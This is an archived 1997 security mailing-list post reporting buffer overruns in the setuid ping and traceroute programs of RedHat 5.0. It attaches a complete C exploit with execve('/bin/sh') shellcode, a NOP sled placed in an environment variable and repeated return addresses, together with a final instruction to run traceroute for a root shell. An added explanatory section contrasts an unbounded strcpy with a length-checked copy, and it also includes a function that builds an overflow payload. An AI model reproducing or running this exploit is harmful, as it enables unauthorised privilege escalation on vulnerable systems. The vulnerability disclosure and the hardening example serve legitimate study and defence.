Buffer Overrun in RedHat 5.0

Wilton Wong - ListMail (listmail@NOVA.BLACKSTAR.NET)
Sat, 13 Dec 1997 13:19:04 -0700


Just going through some setuid things and noticed that in RedHat 5.0 you
can overrun the buffers in /bin/ping and /usr/sbin/traceroute. I attached
an exploit for traceroute, nothing fancy, just what I had to test it with,
a simple eggshell.

Sorry if this has been mentioned before..

-- Wilton

-------------------------------------------------------------------------
Wilton Wong                          BlackStar Communications
URL: http://www.blackstar.net        16121 - 57 Street
Email: wwong@blackstar.net           Edmonton AB T5Y 2T1
Tel: (403) 486-7783                  Fax: (403) 484-6004
-------------------------------------------------------------------------

Attachment: trace_shell.c

/*

   Just Your Standard EGGSHELL Proggie:
   traceroute buffer overflow exploit for RedHat Linux 5.0
   mostly ripped from Aleph One <aleph1@underground.org>

   Wilton Wong
   wwong@blackstar.net

   gcc -o trace_shell trace_shell.c

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                 0
#define DEFAULT_BUFFER_SIZE            1019
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

/* Aleph One's 46-byte Linux/i386 execve("/bin/sh") shellcode */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* current stack pointer (i386 only: the value left in %eax is the return value) */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  /* usage: trace_shell [bsize] [offset] [eggsize] */
  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  /* +3: the address loop below writes whole 4-byte words, so a bsize that
     is not a multiple of 4 (the default, 1019) would otherwise run past
     the end of the allocation */
  if (!(buff = malloc(bsize + 3))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(1);
  }

  /* guessed return address: somewhere inside the NOP sled that EGG= will
     occupy near the top of traceroute's stack; tune it with offset */
  addr = get_sp() - offset;
  printf("Using address: 0x%lx\n", addr);

  /* RET= is bsize bytes of the guessed address repeated, so that wherever
     the saved return address sits inside the overrun it gets overwritten */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* EGG= is a NOP sled followed by the shellcode */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* the first four bytes of each buffer become the variable name */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  printf("Now run: /usr/sbin/traceroute $RET\n");
  system("/bin/bash");
  return 0;
}
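The class of bug the post describes, as an added example that is not code from the original message, from Aleph One's eggshell, or from RedHat's ping or traceroute: a fixed-size stack buffer filled from a command-line argument by an unbounded copy, beside a version that checks the length before copying. The function names, the 64-byte HOSTLEN and the address 0xbffff8e0 are assumptions for illustration; the 1019-byte payload matches the attachment's DEFAULT_BUFFER_SIZE. The payload builder fills byte by byte, which keeps a size that is not a multiple of 4 in bounds.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the illustration; the real size inside traceroute
   is not given in the post. */
#define HOSTLEN 64

/* Vulnerable pattern: a command-line argument copied into a fixed-size stack
   buffer with no length check. An argument longer than HOSTLEN - 1 bytes
   writes past `host` into the rest of the frame, including the saved return
   address, which is what the exploit's RET= buffer is sized to reach. */
int lookup_host_vulnerable(const char *arg)
{
    char host[HOSTLEN];

    strcpy(host, arg);               /* unbounded copy: the overrun */
    return (int)strlen(host);
}

/* Hardened form: measure first, refuse anything that does not fit, then copy
   a known number of bytes. Returns the length copied, or -1 if rejected. */
int lookup_host_checked(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);

    if (outlen == 0 || n >= outlen)  /* need room for the terminating NUL */
        return -1;
    memcpy(out, arg, n + 1);         /* n bytes plus the NUL, never more */
    return (int)n;
}

/* Builds an argument shaped like the exploit's RET= buffer: `bsize` bytes
   holding `addr` repeated in little-endian byte order, NUL-terminated in the
   last byte. Filling byte by byte keeps odd sizes such as 1019 in bounds. */
char *make_ret_payload(size_t bsize, uint32_t addr)
{
    char *buf;
    size_t i;

    if (bsize < 2)
        return NULL;
    buf = malloc(bsize);
    if (buf == NULL)
        return NULL;
    for (i = 0; i < bsize - 1; i++)
        buf[i] = (char)((addr >> (8 * (i % 4))) & 0xff);
    buf[bsize - 1] = '\0';
    return buf;
}

int main(void)
{
    char out[HOSTLEN];
    /* 0xbffff8e0 is an assumed stack address, chosen only because none of
       its bytes is zero (a zero byte would end the argument early). */
    char *payload = make_ret_payload(1019, 0xbffff8e0u);

    printf("checked, short arg: %d\n",
           lookup_host_checked("www.blackstar.net", out, sizeof out));
    printf("checked, 1019-byte arg: %d\n",
           lookup_host_checked(payload, out, sizeof out));
    /* lookup_host_vulnerable(payload) is deliberately not called: on a system
       without stack protection it would overwrite this frame's return address. */
    free(payload);
    return 0;
}
```

The checked version returns -1 for the 1019-byte argument and 17 for the short hostname. Whether an overrun in a real setuid binary actually reaches the saved return address depends on the frame layout, which is why the attached exploit takes the buffer size and offset as arguments and why its EGG= sled is 2048 bytes: the guessed address only has to land somewhere inside the sled.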